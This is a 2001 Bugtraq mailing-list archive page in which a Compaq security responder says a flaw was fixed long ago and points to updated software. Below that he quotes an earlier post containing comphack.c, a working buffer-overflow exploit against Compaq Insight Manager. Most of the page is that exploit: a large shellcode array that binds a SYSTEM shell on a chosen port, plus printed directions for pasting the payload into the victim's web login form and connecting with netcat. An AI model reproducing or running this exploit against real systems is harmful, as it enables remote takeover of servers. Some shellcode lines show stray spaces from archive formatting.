Bugtraq mailing list archives
re: comphack - Compaq Insight Manager Remote SYSTEM shell
From: "Boren, Rich (SSRT)" <Rich.Boren () COMPAQ com>
Date: Fri, 7 Dec 2001 16:06:43 -0700
re: comphack - Compaq Insight Manager Remote SYSTEM shell This has been fixed for at least 18 months. We suggest that you get the current release of software of agents and Compaq Insight manager. Version 5.2 or 5.1 it's on the web.... http://www.compaq.com/products/servers/management/ and so the are the old advisories... www.compaq.com/products/servers/management/system-advisories.html regards, Rich -----Original Message----- From: Indigo [mailto:indig0 () talk21 com] Sent: Thursday, November 29, 2001 4:55 AM To: bugtraq () securityfocus com Subject: comphack - Compaq Insight Manager Remote SYSTEM shell Mailer: SecurityFocus I'm running out of Win32 vulnerabilities to exploit here...Anyone got any ideas? Cheers, Indigo. /* comphack.c - Compaq Insight Manager overflow exploit by Indigo <indig0 () talk21 com> 2001 Usage: comphack <victim port> This code has been compiled and tested on Linux and Win32 The shellcode spawns a SYSTEM shell on the chosen port Main shellcode adapted from code written by izan () deepzone org Greets to: Morphsta, Br00t, Macavity, Jacob & Monkfish...Not forgetting D-Niderlunds */ /* #include <windows.h> uncomment if compiling on Win32 */ #include <stdio.h> int main(int argc, char **argv) { unsigned char shellcode[] = "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61" "\x61\x61\x61\x61\x61\x61\x61\x61\x2B\x16\xEA\x77 \xFF\xE1\x03\x10" "\xEA\x2F\x05\x10\x90\x90\x90\x90\x31\xFF\x01\xE7 \x31\xC9\xB1\x6F" "\x01\xCF\xB1\x4C\x01\xCF\x31\xC0\xB0\x20\x29\x07 \x31\xDB\xB3\x18" "\x01\xDF\x29\x07\xB3\x20\x01\xDF\x29\x07\xB3 \x1D\x01\xDF\x29\x07" "\xB3\x19\x01\xDF\x29\x07\xB3\x55\x01\xDF\x29\x07 \xB3\x05\x01\xDF" "\xB3\x05\x01\xDF\x29\x07\xB3\x4B\x01\xDF\x29\x07 \xB3\x12\x01\xDF" "\x29\x07\xB3\x17\x01\xDF\x29\x07\xB3\x07\x01 \xDF\x29\x07\xB3\x14" "\x01\xDF\x29\x07\xB3\x28\x01\xDF\x29\x07\xB3 \x3F\x01\xDF\x29\x07" "\xB3\x7C\x01\xDF\x29\x07\xB3\xCE\x01\xDF\x29\x07 \xB3\x08\x01\xDF" "\x29\x07\xB3\x3B\x01\xDF\x29\x07\xB3\x4B\x01 \xDF\x29\x07\x66\x81" "\xEF\xA3\x03\x31\xDB\xB8\x5F\x5F\x5F\x5F\x31\x07 \x47\x47\x47\x47" "\x43\x43\x43\x43\x66\x81\xFB\xFC\x04\x7E\xEF\xB7 \x5F\x5F\x5F\x5F" "\x02\xDE\xB2\xA6\x7E\x1F\x5F\xD2 \xEA\xAD\x7B\x1F\x5F\xD2\xE2\xA5" "\x7B\x1F\x5F\x35\x58\xCF\xCF\xCF\xCF\x06\xB7 \xAD\x5D\x5F\x5F\xD2" "\xEA\x75\x7A\x1F\x5F\xD2\xE2\x6C\x7A\x1F\x5F\x35 \x55\xCF\xCF\xCF" "\xCF\x06\xB7\xE5\x5D\x5F\x5F\x35\x5F\xD2\xEA\xA6 \x7A\x1F\x5F\x09" "\xD2\xEA\xBA\x7A\x1F\x5F\x09\xD2\xEA\xB6 \x7A\x1F\x5F\x09\xA0\xCA" "\x6C\x7A\x1F\x5F\x35\x5F\xD2\xEA\xA6 \x7A\x1F\x5F\x09\xD2\xEA\xB2" "\x7A\x1F\x5F\x09\xD2\xEA\xAE\x7A\x1F\x5F\x09\xA0 \xCA\x6C\x7A\x1F" "\x5F\xB8\xDA\xAA\x7A\x1F\x5F\x1B\x5F\x5F\x5F\xD2 \xEA\xAA\x7A\x1F" "\x5F\x09\xA0\xCA\x68\x7A\x1F\x5F\xD2\xEA\x72\x79 \x1F\x5F\xF2\x0F" "\xA0\xCA\x0C\x7A\x1F\x5F\xD2\xEA\x6E\x79 \x1F\x5F\xF2\x0F\xA0\xCA" "\x0C\x7A\x1F\x5F\xD2\xEA\xAE\x7A\x1F\x5F\xD2 \xE2\x72\x79\x1F\x5F" "\xFA\xD2\xEA\xBA\x7A\x1F\x5F\xF2\xD2\xE2 \x6E\x79\x1F\x5F\xF4\xD2" "\xE2\x6A\x79\x1F\x5F\xF4\xB8\xDA\x7A\x79 \x1F\x5F\x5F\x5F\x5F\x5F" "\xB8\xDA\x7E\x79\x1F\x5F\x5E\x5E\x5F\x5F\xD2 \xEA\x66\x79\x1F\x5F" "\x09\xD2\xEA\xAA\x7A\x1F\x5F\x09\x35\x5F\x35 \x5F\x35\x4F\x35\x5E" "\x35\x5F\x35\x5F\xD2\xEA\x16\x79\x1F\x5F\x09\x35 \x5F\xA0\xCA\x64" "\x7A\x1F\x5F\x37\x5F\x7F\x5F\x5F\xCF\x37 \x5F\x5D\x5F\x5F\xA0\xCA" "\x1C\x7A\x1F\x5F\xD6\xDA\x0E\x79 \x1F\x5F\x6C\xBF\x0F\x1F\x0F\x1F" "\x0F\xA0\xCA\xA5\x7B\x1F\x5F\x0F\x04\x35\x4F\xD2 \xEA\xB6\x7A\x1F" "\x5F\x09\x0C\xA0\xCA\xA1\x7B\x1F\x5F\x35 \x5C\x0C\xA0\xCA\x5D\x7A" "\x1F\x5F\xD2\xEA\x2A\x79\x1F\x5F\x09\xD2\xEA\xB6 \x7A\x1F\x5F\x09" "\x0C\xA0\xCA\x59\x7A\x1F\x5F\xD2\xE2\x06\x79 \x1F\x5F\xF4\x6C\xBF" "\x0F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\x0F\x0F\xD2 \xEA\xB6\x7A\x1F" "\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0 \xCA\x10\x7A\x1F" "\x5F\xB4\x12\xCF\xCF\xCF\x6C\xBF\x0F\xD2\xE2 \x3A\x79\x1F\x5F\x08" "\x0F\x0F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0 \xCA\x60\x7A\x1F" "\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xDC\xE2 \x3A\x79\x1F\x5F\x5D" "\x50\xDD\x48\x5E\x5F\x5F\xDE\xE2\x3A\x79 \x1F\x5F\x5E\x7F\x5F\x5F" "\x2D\x51\xCF\xCF\xCF\xCF\xB8\xDA\x3A\x79 \x1F\x5F\x5F\x7F\x5F\x5F" "\x35\x5F\xD4\xDA\x3A\x79\x1F\x5F\xD2\xE2\x3A\x79 \x1F\x5F\x08\x0F" "\xD4\xDA\x0E\x79\x1F\x5F\x0F\xD2\xEA\xB6 \x7A\x1F\x5F\xF2\x0F\xA0" "\xCA\x18\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10 \x7A\x1F\x5F\xD4\xDA\x3A" "\x79\x1F\x5F\x35\x5F\x0F\xD2\xEA\x0E\x79 \x1F\x5F\xF2\x0F\xD2\xEA" "\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x55 \x7A\x1F\x5F\x35\x5F\xD2\xE2" "\x3A\x79\x1F\x5F\x08\x35\x5F\x35\x5F\x35\x5F\xD2 \xEA\xB6\x7A\x1F" "\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0 \xCA\x10\x7A\x1F" "\x5F\x6C\xB6\x66\xD2\x3A\x79\x1F\x5F\x50\xD8\x38 \xA0\xA0\xA0\x35" "\x5F\x37\x5F\x7F\x5F\x5F\xCF\xD2\xEA\x0E\x79 \x1F\x5F\xF2\x0F\xD2" "\xEA\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x51 \x7A\x1F\x5F\xD6\xDA\x3E" "\x79\x1F\x5F\x35\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08 \x0F\xD2\xEA\x0E" "\x79\x1F\x5F\xF2\x0F\xD2\xEA\xB2\x7A\x1F\x5F\xF2 \x0F\xA0\xCA\x14" "\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\x35 \x5F\xD4\xDA\x3E" "\x79\x1F\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\xD4 \xDA\x0E\x79\x1F" "\x5F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0 \xCA\x18\x7A\x1F\x5F" "\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xB6\xE6\xA1\xA0 \xA0\xD2\xEA\x06" "\x79\x1F\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\xD2 \xEA\x02\x79\x1F" "\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\x35\x5F\xA0 \xCA\x08\x7A\x1F" "\x5F\x0E\x09\x37\x0F\x6D\x5A\x4F\xCF\x05\xA0 \x4D\x0F\x04\x06\x08" "\x01\x0E\x09\x0C\x37\x07\x6D\x5A\x4F\xCF\x05\xA0 \x4D\x0F\xF3\xDB" "\xBF\x2A\xA4\x07\xF4\x06\xBD\xB6\xBC\x08\x0C\x10 \x1C\x14\x6C\x6D" "\x5F\x2C\x30\x3C\x34\x3A\x2B\x5F\x3D\x36\x31 \x3B\x5F\x33\x36\x2C" "\x2B\x3A\x31 \x5F\x3E\x3C\x3C\x3A\x2F\x2B\x5F\x2C\x3A\x31 \x3B\x5F" "\x2D\x3A\x3C\x29\x5F\x3C\x33\x30\x2C\x3A\x2C\x30 \x3C\x34\x3A\x2B" "\x5F\x14\x1A\x2D\x11\x1A\x13 \x6C\x6D\x5F\x1C\x2D\x3A\x3E\x2B\x3A" "\x0F\x36\x2F\x3A\x5F\x18 \x3A\x2B\x0C\x2B\x3E\x2D\x2B\x2A\x2F\x16" "\x31\x39\x30 \x1E\x5F\x1C\x2D\x3A\x3E\x2B\x3A\x0F\x2D\x30 \x3C\x3A" "\x2C\x2C\x1E\x5F\x0F\x3A\x3A\x34\x11\x3E\x32 \x3A\x3B\x0F\x36\x2F" "\x3A\x5F\x18\x33\x30\x3D\x3E\x33\x1E\x33\x33\x30 \x3C\x5F\x2D\x3A" "\x3E\x3B\x19\x36\x33\x3A\x5F\x08\x2D\x36 \x2B\x3A\x19\x36\x33\x3A" "\x5F\x0C\x33\x3A\x3A\x2F\x5F\x1C\x33\x30 \x2C\x3A\x17\x3E\x31\x3B" "\x33\x3A\x5F\x1A\x27\x36\x2B\x0F\x2D\x30 \x3C\x3A\x2C\x2C\x5F\x1C" "\x30\x3B\x3A\x3B\x7F\x3D\x26\x7F\x23\x05\x3E\x31 \x7F\x63\x36\x25" "\x3E\x31\x1F\x3B\x3A\x3A\x2F\x25\x30\x31\x3A\x71 \x30\x2D\x38\x61" "\x5D\x5F\x40\x17 \x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F" "\x53 \x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5E\x5F\x5F\x5F\x5F\x 5F\x5F\x5F" "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F" "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F" "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F" "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F" "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F" "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F" "\x1C\x12\x1B\x71\x1A\x07 \x1A\x5F\x5F\x5F\x5F\x5F\x4F\x5F\x5F\x5F" "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F" "\x56\x56\x56\x56\x56\x00"; FILE *fp; unsigned short int a_port; printf ("\nCompaq Insight Manager overflow launcher\nby Indigo <indig0 () talk21 com> 2001\n\n"); printf ("This program will generate a binary file called exploit.bin\n"); printf ("Connect to the victim using a web browser http://victim:2301\n"); printf ("Next to \'Login Account\', click on \'anonymous\'\n"); printf ("Enter some random characters into the \'password\' field\n"); printf ("Open exploit.bin in notepad, highlight it then copy to the clipboard\n"); printf ("Paste the exploit into the \'Name\' field and click OK\n"); printf ("\nLaunch netcat: nc <victim host> <victim port>\n"); printf ("\nThe exploit spawns a SYSTEM shell on the chosen port\n\n"); if (argc != 2) { printf ("Usage: %s <victim port>\n", argv[0]); exit (0); } a_port = htons(atoi(argv[1])); a_port^= 0x5f5f; shellcode[1650]= (a_port) & 0xff; shellcode[1651]= (a_port >> 8) & 0xff; fp = fopen ("./exploit.bin","wb"); fputs (shellcode,fp); fclose (fp); return 0; }
Current thread:
- re: comphack - Compaq Insight Manager Remote SYSTEM shell Boren, Rich (SSRT) (Dec 07)